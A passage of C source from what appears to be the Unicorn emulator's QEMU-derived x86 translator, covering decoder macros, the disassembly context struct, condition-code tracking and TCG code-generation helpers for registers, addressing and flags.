3) | 4: \ case (1 << 6) | (OP << 3) | 5: \ case (1 << 6) | (OP << 3) | 6: \ case (1 << 6) | (OP << 3) | 7: \ case (2 << 6) | (OP << 3) | 0: \ case (2 << 6) | (OP << 3) | 1: \ case (2 << 6) | (OP << 3) | 2: \ case (2 << 6) | (OP << 3) | 3: \ case (2 << 6) | (OP << 3) | 4: \ case (2 << 6) | (OP << 3) | 5: \ case (2 << 6) | (OP << 3) | 6: \ case (2 << 6) | (OP << 3) | 7 #define CASE_MODRM_OP(OP) \ case (0 << 6) | (OP << 3) | 0: \ case (0 << 6) | (OP << 3) | 1: \ case (0 << 6) | (OP << 3) | 2: \ case (0 << 6) | (OP << 3) | 3: \ case (0 << 6) | (OP << 3) | 4: \ case (0 << 6) | (OP << 3) | 5: \ case (0 << 6) | (OP << 3) | 6: \ case (0 << 6) | (OP << 3) | 7: \ case (1 << 6) | (OP << 3) | 0: \ case (1 << 6) | (OP << 3) | 1: \ case (1 << 6) | (OP << 3) | 2: \ case (1 << 6) | (OP << 3) | 3: \ case (1 << 6) | (OP << 3) | 4: \ case (1 << 6) | (OP << 3) | 5: \ case (1 << 6) | (OP << 3) | 6: \ case (1 << 6) | (OP << 3) | 7: \ case (2 << 6) | (OP << 3) | 0: \ case (2 << 6) | (OP << 3) | 1: \ case (2 << 6) | (OP << 3) | 2: \ case (2 << 6) | (OP << 3) | 3: \ case (2 << 6) | (OP << 3) | 4: \ case (2 << 6) | (OP << 3) | 5: \ case (2 << 6) | (OP << 3) | 6: \ case (2 << 6) | (OP << 3) | 7: \ case (3 << 6) | (OP << 3) | 0: \ case (3 << 6) | (OP << 3) | 1: \ case (3 << 6) | (OP << 3) | 2: \ case (3 << 6) | (OP << 3) | 3: \ case (3 << 6) | (OP << 3) | 4: \ case (3 << 6) | (OP << 3) | 5: \ case (3 << 6) | (OP << 3) | 6: \ case (3 << 6) | (OP << 3) | 7 #include "exec/gen-icount.h" typedef struct DisasContext { DisasContextBase base; /* current insn context */ int override; /* -1 if no override */ int prefix; MemOp aflag; MemOp dflag; target_ulong pc_start; target_ulong pc; /* pc = eip + cs_base */ /* current block context */ target_ulong cs_base; /* base of CS segment */ int pe; /* protected mode */ int code32; /* 32 bit code segment */ #ifdef TARGET_X86_64 int lma; /* long mode active */ int code64; /* 64 bit code segment */ int rex_x, rex_b; #endif int vex_l; /* vex vector length */ int vex_v; /* vex vvvv register, without 1's complement. */ int ss32; /* 32 bit stack segment */ CCOp cc_op; /* current CC operation */ CCOp last_cc_op; /* Unicorn: last CC operation. Save this to see if cc_op has changed */ bool cc_op_dirty; #ifdef TARGET_X86_64 bool x86_64_hregs; #endif int addseg; /* non zero if either DS/ES/SS have a non zero base */ int f_st; /* currently unused */ int vm86; /* vm86 mode */ int cpl; int iopl; int tf; /* TF cpu flag */ int jmp_opt; /* use direct block chaining for direct jumps */ int repz_opt; /* optimize jumps within repz instructions */ int mem_index; /* select memory access functions */ uint64_t flags; /* all execution flags */ int popl_esp_hack; /* for correct popl with esp base handling */ int rip_offset; /* only used in x86_64, but left for simplicity */ int cpuid_features; int cpuid_ext_features; int cpuid_ext2_features; int cpuid_ext3_features; int cpuid_7_0_ebx_features; int cpuid_xsave_features; /* TCG local temps */ TCGv cc_srcT; TCGv A0; TCGv T0; TCGv T1; /* TCG local register indexes (only used inside old micro ops) */ TCGv tmp0; TCGv tmp4; TCGv_ptr ptr0; TCGv_ptr ptr1; TCGv_i32 tmp2_i32; TCGv_i32 tmp3_i32; TCGv_i64 tmp1_i64; sigjmp_buf jmpbuf; // Unicorn struct uc_struct *uc; target_ulong prev_pc; /* save address of the previous instruction */ } DisasContext; static void gen_eob(DisasContext *s); static void gen_jr(DisasContext *s, TCGv dest); static void gen_jmp(DisasContext *s, target_ulong eip); static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num); static void gen_op(DisasContext *s, int op, MemOp ot, int d); /* i386 arith/logic operations */ enum { OP_ADDL, OP_ORL, OP_ADCL, OP_SBBL, OP_ANDL, OP_SUBL, OP_XORL, OP_CMPL, }; /* i386 shift ops */ enum { OP_ROL, OP_ROR, OP_RCL, OP_RCR, OP_SHL, OP_SHR, OP_SHL1, /* undocumented */ OP_SAR = 7, }; enum { JCC_O, JCC_B, JCC_Z, JCC_BE, JCC_S, JCC_P, JCC_L, JCC_LE, }; enum { /* I386 int registers */ OR_EAX, /* MUST be even numbered */ OR_ECX, OR_EDX, OR_EBX, OR_ESP, OR_EBP, OR_ESI, OR_EDI, OR_TMP0 = 16, /* temporary operand register */ OR_TMP1, OR_A0, /* temporary register used when doing address evaluation */ }; enum { USES_CC_DST = 1, USES_CC_SRC = 2, USES_CC_SRC2 = 4, USES_CC_SRCT = 8, }; /* Bit set if the global variable is live after setting CC_OP to X. */ static const uint8_t cc_op_live[CC_OP_NB] = { [CC_OP_DYNAMIC] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_EFLAGS] = USES_CC_SRC, [CC_OP_MULB] = USES_CC_DST | USES_CC_SRC, [CC_OP_MULW] = USES_CC_DST | USES_CC_SRC, [CC_OP_MULL] = USES_CC_DST | USES_CC_SRC, [CC_OP_MULQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDB] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDW] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDL] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADCB] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCW] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCL] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SUBB] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SUBW] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SUBL] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SUBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SBBB] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SBBW] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SBBL] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SBBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_LOGICB] = USES_CC_DST, [CC_OP_LOGICW] = USES_CC_DST, [CC_OP_LOGICL] = USES_CC_DST, [CC_OP_LOGICQ] = USES_CC_DST, [CC_OP_INCB] = USES_CC_DST | USES_CC_SRC, [CC_OP_INCW] = USES_CC_DST | USES_CC_SRC, [CC_OP_INCL] = USES_CC_DST | USES_CC_SRC, [CC_OP_INCQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECB] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECW] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECL] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLB] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLW] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLL] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARB] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARW] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARL] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGB] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGW] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGL] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADCX] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADOX] = USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCOX] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_CLR] = 0, [CC_OP_POPCNT] = USES_CC_SRC, }; static inline void gen_jmp_im(DisasContext *s, target_ulong pc); static void set_cc_op(DisasContext *s, CCOp op) { int dead; TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; TCGv cpu_cc_dst = tcg_ctx->cpu_cc_dst; TCGv cpu_cc_src = tcg_ctx->cpu_cc_src; TCGv cpu_cc_src2 = tcg_ctx->cpu_cc_src2; if (s->cc_op == op) { return; } /* Discard CC computation that will no longer be used. */ dead = cc_op_live[s->cc_op] & ~cc_op_live[op]; if (dead & USES_CC_DST) { tcg_gen_discard_tl(tcg_ctx, cpu_cc_dst); } if (dead & USES_CC_SRC) { tcg_gen_discard_tl(tcg_ctx, cpu_cc_src); } if (dead & USES_CC_SRC2) { tcg_gen_discard_tl(tcg_ctx, cpu_cc_src2); } if (dead & USES_CC_SRCT) { tcg_gen_discard_tl(tcg_ctx, s->cc_srcT); } if (op == CC_OP_DYNAMIC) { /* The DYNAMIC setting is translator only, and should never be stored. Thus we always consider it clean. */ s->cc_op_dirty = false; } else { /* Discard any computed CC_OP value (see shifts). */ if (s->cc_op == CC_OP_DYNAMIC) { tcg_gen_discard_i32(tcg_ctx, cpu_cc_op); } s->cc_op_dirty = true; } s->cc_op = op; } static void gen_update_cc_op(DisasContext *s) { if (s->cc_op_dirty) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; tcg_gen_movi_i32(tcg_ctx, cpu_cc_op, s->cc_op); s->cc_op_dirty = false; } } #ifdef TARGET_X86_64 #define NB_OP_SIZES 4 #else /* !TARGET_X86_64 */ #define NB_OP_SIZES 3 #endif /* !TARGET_X86_64 */ #if defined(HOST_WORDS_BIGENDIAN) #define REG_B_OFFSET (sizeof(target_ulong) - 1) #define REG_H_OFFSET (sizeof(target_ulong) - 2) #define REG_W_OFFSET (sizeof(target_ulong) - 2) #define REG_L_OFFSET (sizeof(target_ulong) - 4) #define REG_LH_OFFSET (sizeof(target_ulong) - 8) #else #define REG_B_OFFSET 0 #define REG_H_OFFSET 1 #define REG_W_OFFSET 0 #define REG_L_OFFSET 0 #define REG_LH_OFFSET 4 #endif /* In instruction encodings for byte register accesses the * register number usually indicates "low 8 bits of register N"; * however there are some special cases where N 4..7 indicates * [AH, CH, DH, BH], ie "bits 15..8 of register N-4". Return * true for this special case, false otherwise. */ static inline bool byte_reg_is_xH(DisasContext *s, int reg) { if (reg < 4) { return false; } #ifdef TARGET_X86_64 if (reg >= 8 || s->x86_64_hregs) { return false; } #endif return true; } /* Select the size of a push/pop operation. */ static inline MemOp mo_pushpop(DisasContext *s, MemOp ot) { if (CODE64(s)) { return ot == MO_16 ? MO_16 : MO_64; } else { return ot; } } /* Select the size of the stack pointer. */ static inline MemOp mo_stacksize(DisasContext *s) { return CODE64(s) ? MO_64 : s->ss32 ? MO_32 : MO_16; } /* Select only size 64 else 32. Used for SSE operand sizes. */ static inline MemOp mo_64_32(MemOp ot) { #ifdef TARGET_X86_64 return ot == MO_64 ? MO_64 : MO_32; #else return MO_32; #endif } /* Select size 8 if lsb of B is clear, else OT. Used for decoding byte vs word opcodes. */ static inline MemOp mo_b_d(int b, MemOp ot) { return b & 1 ? ot : MO_8; } /* Select size 8 if lsb of B is clear, else OT capped at 32. Used for decoding operand size of port opcodes. */ static inline MemOp mo_b_d32(int b, MemOp ot) { return b & 1 ? (ot == MO_16 ? MO_16 : MO_32) : MO_8; } static void gen_op_mov_reg_v(DisasContext *s, MemOp ot, int reg, TCGv t0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch(ot) { case MO_8: if (!byte_reg_is_xH(s, reg)) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], tcg_ctx->cpu_regs[reg], t0, 0, 8); } else { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_regs[reg - 4], tcg_ctx->cpu_regs[reg - 4], t0, 8, 8); } break; case MO_16: tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], tcg_ctx->cpu_regs[reg], t0, 0, 16); break; case MO_32: /* For x86_64, this sets the higher half of register to zero. For i386, this is equivalent to a mov. */ tcg_gen_ext32u_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], t0); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], t0); break; #endif default: tcg_abort(); } } static inline void gen_op_mov_v_reg(DisasContext *s, MemOp ot, TCGv t0, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (ot == MO_8 && byte_reg_is_xH(s, reg)) { tcg_gen_extract_tl(tcg_ctx, t0, tcg_ctx->cpu_regs[reg - 4], 8, 8); } else { tcg_gen_mov_tl(tcg_ctx, t0, tcg_ctx->cpu_regs[reg]); } } static void gen_add_A0_im(DisasContext *s, int val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, val); if (!CODE64(s)) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0); } } static inline void gen_op_jmp_v(TCGContext *tcg_ctx, TCGv dest) { tcg_gen_st_tl(tcg_ctx, dest, tcg_ctx->cpu_env, offsetof(CPUX86State, eip)); } static inline void gen_op_add_reg_im(DisasContext *s, MemOp size, int reg, int32_t val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[reg], val); gen_op_mov_reg_v(s, size, reg, s->tmp0); } static inline void gen_op_add_reg_T0(DisasContext *s, MemOp size, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_add_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[reg], s->T0); gen_op_mov_reg_v(s, size, reg, s->tmp0); } static inline void gen_sync_pc(TCGContext *ctx, uint64_t pc) { TCGv v = tcg_temp_new(ctx); tcg_gen_movi_tl(ctx, v, pc); gen_op_jmp_v(ctx, v); tcg_temp_free(ctx, v); } static inline void gen_op_ld_v(DisasContext *s, int idx, TCGv t0, TCGv a0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ)) gen_sync_pc(tcg_ctx, s->prev_pc); // Unicorn: sync EIP tcg_gen_qemu_ld_tl(tcg_ctx, t0, a0, s->mem_index, idx | MO_LE); } static inline void gen_op_st_v(DisasContext *s, int idx, TCGv t0, TCGv a0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) gen_sync_pc(tcg_ctx, s->prev_pc); // Unicorn: sync EIP tcg_gen_qemu_st_tl(tcg_ctx, t0, a0, s->mem_index, idx | MO_LE); } static inline void gen_op_st_rm_T0_A0(DisasContext *s, int idx, int d) { if (d == OR_TMP0) { gen_op_st_v(s, idx, s->T0, s->A0); } else { gen_op_mov_reg_v(s, idx, d, s->T0); } } static inline void gen_jmp_im(DisasContext *s, target_ulong pc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, s->tmp0, pc); gen_op_jmp_v(tcg_ctx, s->tmp0); } /* Compute SEG:REG into A0. SEG is selected from the override segment (OVR_SEG) and the default segment (DEF_SEG). OVR_SEG may be -1 to indicate no override. */ static void gen_lea_v_seg(DisasContext *s, MemOp aflag, TCGv a0, int def_seg, int ovr_seg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (aflag) { #ifdef TARGET_X86_64 case MO_64: if (ovr_seg < 0) { tcg_gen_mov_tl(tcg_ctx, s->A0, a0); return; } break; #endif case MO_32: /* 32 bit address */ if (ovr_seg < 0 && s->addseg) { ovr_seg = def_seg; } if (ovr_seg < 0) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, a0); return; } break; case MO_16: /* 16 bit address */ tcg_gen_ext16u_tl(tcg_ctx, s->A0, a0); a0 = s->A0; if (ovr_seg < 0) { if (s->addseg) { ovr_seg = def_seg; } else { return; } } break; default: tcg_abort(); } if (ovr_seg >= 0) { TCGv seg = tcg_ctx->cpu_seg_base[ovr_seg]; if (aflag == MO_64) { tcg_gen_add_tl(tcg_ctx, s->A0, a0, seg); } else if (CODE64(s)) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, a0); tcg_gen_add_tl(tcg_ctx, s->A0, s->A0, seg); } else { tcg_gen_add_tl(tcg_ctx, s->A0, a0, seg); tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0); } } } static inline void gen_string_movl_A0_ESI(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_lea_v_seg(s, s->aflag, tcg_ctx->cpu_regs[R_ESI], R_DS, s->override); } static inline void gen_string_movl_A0_EDI(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_lea_v_seg(s, s->aflag, tcg_ctx->cpu_regs[R_EDI], R_ES, -1); } static inline void gen_op_movl_T0_Dshift(DisasContext *s, MemOp ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32s_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, df)); tcg_gen_shli_tl(tcg_ctx, s->T0, s->T0, ot); }; static TCGv gen_ext_tl(TCGContext *tcg_ctx, TCGv dst, TCGv src, MemOp size, bool sign) { switch (size) { case MO_8: if (sign) { tcg_gen_ext8s_tl(tcg_ctx, dst, src); } else { tcg_gen_ext8u_tl(tcg_ctx, dst, src); } return dst; case MO_16: if (sign) { tcg_gen_ext16s_tl(tcg_ctx, dst, src); } else { tcg_gen_ext16u_tl(tcg_ctx, dst, src); } return dst; #ifdef TARGET_X86_64 case MO_32: if (sign) { tcg_gen_ext32s_tl(tcg_ctx, dst, src); } else { tcg_gen_ext32u_tl(tcg_ctx, dst, src); } return dst; #endif default: return src; } } static void gen_extu(TCGContext *tcg_ctx, MemOp ot, TCGv reg) { gen_ext_tl(tcg_ctx, reg, reg, ot, false); } static void gen_exts(TCGContext *tcg_ctx, MemOp ot, TCGv reg) { gen_ext_tl(tcg_ctx, reg, reg, ot, true); } static inline void gen_op_jnz_ecx(DisasContext *s, MemOp size, TCGLabel *label1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[R_ECX]); gen_extu(tcg_ctx, size, s->tmp0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, s->tmp0, 0, label1); } static inline void gen_op_jz_ecx(DisasContext *s, MemOp size, TCGLabel *label1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[R_ECX]); gen_extu(tcg_ctx, size, s->tmp0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, s->tmp0, 0, label1); } static void gen_helper_in_func(TCGContext *tcg_ctx, MemOp ot, TCGv v, TCGv_i32 n) { switch (ot) { case MO_8: gen_helper_inb(tcg_ctx, v, tcg_ctx->cpu_env, n); break; case MO_16: gen_helper_inw(tcg_ctx, v, tcg_ctx->cpu_env, n); break; case MO_32: gen_helper_inl(tcg_ctx, v, tcg_ctx->cpu_env, n); break; default: tcg_abort(); } } static void gen_helper_out_func(TCGContext *tcg_ctx, MemOp ot, TCGv_i32 v, TCGv_i32 n) { switch (ot) { case MO_8: gen_helper_outb(tcg_ctx, tcg_ctx->cpu_env, v, n); break; case MO_16: gen_helper_outw(tcg_ctx, tcg_ctx->cpu_env, v, n); break; case MO_32: gen_helper_outl(tcg_ctx, tcg_ctx->cpu_env, v, n); break; default: tcg_abort(); } } static void gen_check_io(DisasContext *s, MemOp ot, target_ulong cur_eip, uint32_t svm_flags) { // Unicorn: allow all I/O instructions return; TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong next_eip; if (s->pe && (s->cpl > s->iopl || s->vm86)) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); switch (ot) { case MO_8: gen_helper_check_iob(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case MO_16: gen_helper_check_iow(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case MO_32: gen_helper_check_iol(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; default: tcg_abort(); } } if(s->flags & HF_GUEST_MASK) { gen_update_cc_op(s); gen_jmp_im(s, cur_eip); svm_flags |= (1 << (4 + ot)); next_eip = s->pc - s->cs_base; tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_svm_check_io(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, tcg_const_i32(tcg_ctx, svm_flags), tcg_const_i32(tcg_ctx, next_eip - cur_eip)); } } static inline void gen_movs(DisasContext *s, MemOp ot) { gen_string_movl_A0_ESI(s); gen_op_ld_v(s, ot, s->T0, s->A0); gen_string_movl_A0_EDI(s); gen_op_st_v(s, ot, s->T0, s->A0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static void gen_op_update1_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); } static void gen_op_update2_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); } static void gen_op_update3_cc(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, reg); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); } static inline void gen_op_testl_T0_T1_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, s->T1); } static void gen_op_update_neg_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); tcg_gen_movi_tl(tcg_ctx, s->cc_srcT, 0); } /* compute all eflags to cc_src */ static void gen_compute_eflags(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv zero, dst, src1, src2; int live, dead; if (s->cc_op == CC_OP_EFLAGS) { return; } if (s->cc_op == CC_OP_CLR) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, CC_Z | CC_P); set_cc_op(s, CC_OP_EFLAGS); return; } zero = NULL; dst = tcg_ctx->cpu_cc_dst; src1 = tcg_ctx->cpu_cc_src; src2 = tcg_ctx->cpu_cc_src2; /* Take care to not read values that are not live. */ live = cc_op_live[s->cc_op] & ~USES_CC_SRCT; dead = live ^ (USES_CC_DST | USES_CC_SRC | USES_CC_SRC2); if (dead) { zero = tcg_const_tl(tcg_ctx, 0); if (dead & USES_CC_DST) { dst = zero; } if (dead & USES_CC_SRC) { src1 = zero; } if (dead & USES_CC_SRC2) { src2 = zero; } } gen_update_cc_op(s); gen_helper_cc_compute_all(tcg_ctx, tcg_ctx->cpu_cc_src, dst, src1, src2, tcg_ctx->cpu_cc_op); set_cc_op(s, CC_OP_EFLAGS); if (dead) { tcg_temp_free(tcg_ctx, zero); } } typedef struct CCPrepare { TCGCond cond; TCGv reg; TCGv reg2; target_ulong imm; target_ulong mask; bool use_reg2; bool no_setcond; } CCPrepare; /* compute eflags.C to reg */ static CCPrepare gen_prepare_eflags_c(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv t0, t1; int size, shift; switch (s->cc_op) { case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: /* (DATA_TYPE)CC_SRCT < (DATA_TYPE)CC_SRC */ size = s->cc_op - CC_OP_SUBB; t1 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, false); /* If no temporary was used, be careful not to alias t1 and t0. */ t0 = t1 == tcg_ctx->cpu_cc_src ? s->tmp0 : reg; tcg_gen_mov_tl(tcg_ctx, t0, s->cc_srcT); gen_extu(tcg_ctx, size, t0); goto add_sub; case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: /* (DATA_TYPE)CC_DST < (DATA_TYPE)CC_SRC */ size = s->cc_op - CC_OP_ADDB; t1 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, false); t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, size, false); add_sub: return (CCPrepare) { .cond = TCG_COND_LTU, .reg = t0, .reg2 = t1, .mask = -1, .use_reg2 = true }; case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: case CC_OP_CLR: case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_NEVER, .mask = -1 }; case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = -1, .no_setcond = true }; case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: /* (CC_SRC >> (DATA_BITS - 1)) & 1 */ size = s->cc_op - CC_OP_SHLB; shift = (8 << size) - 1; return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = (target_ulong)1 << shift }; case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = -1 }; case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: size = s->cc_op - CC_OP_BMILGB; t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_src, size, false); return (CCPrepare) { .cond = TCG_COND_EQ, .reg = t0, .mask = -1 }; case CC_OP_ADCX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_dst, .mask = -1, .no_setcond = true }; case CC_OP_EFLAGS: case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: /* CC_SRC & 1 */ return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_C }; default: /* The need to compute only C from CC_OP_DYNAMIC is important in efficiently implementing e.g. INC at the start of a TB. */ gen_update_cc_op(s); gen_helper_cc_compute_c(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_op); return (CCPrepare) { .cond = TCG_COND_NE, .reg = reg, .mask = -1, .no_setcond = true }; } } /* compute eflags.P to reg */ static CCPrepare gen_prepare_eflags_p(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_compute_eflags(s); return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_P }; } /* compute eflags.S to reg */ static CCPrepare gen_prepare_eflags_s(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { case CC_OP_DYNAMIC: gen_compute_eflags(s); /* FALLTHRU */ case CC_OP_EFLAGS: case CC_OP_ADCX: case CC_OP_ADOX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_S }; case CC_OP_CLR: case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_NEVER, .mask = -1 }; default: { MemOp size = (s->cc_op - CC_OP_ADDB) & 3; TCGv t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, size, true); return (CCPrepare) { .cond = TCG_COND_LT, .reg = t0, .mask = -1 }; } } } /* compute eflags.O to reg */ static CCPrepare gen_prepare_eflags_o(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { case CC_OP_ADOX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src2, .mask = -1, .no_setcond = true }; case CC_OP_CLR: case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_NEVER, .mask = -1 }; default: gen_compute_eflags(s); return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_O }; } } /* compute eflags.Z to reg */ static CCPrepare gen_prepare_eflags_z(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (s->cc_op) { case CC_OP_DYNAMIC: gen_compute_eflags(s); /* FALLTHRU */ case CC_OP_EFLAGS: case CC_OP_ADCX: case CC_OP_ADOX: case 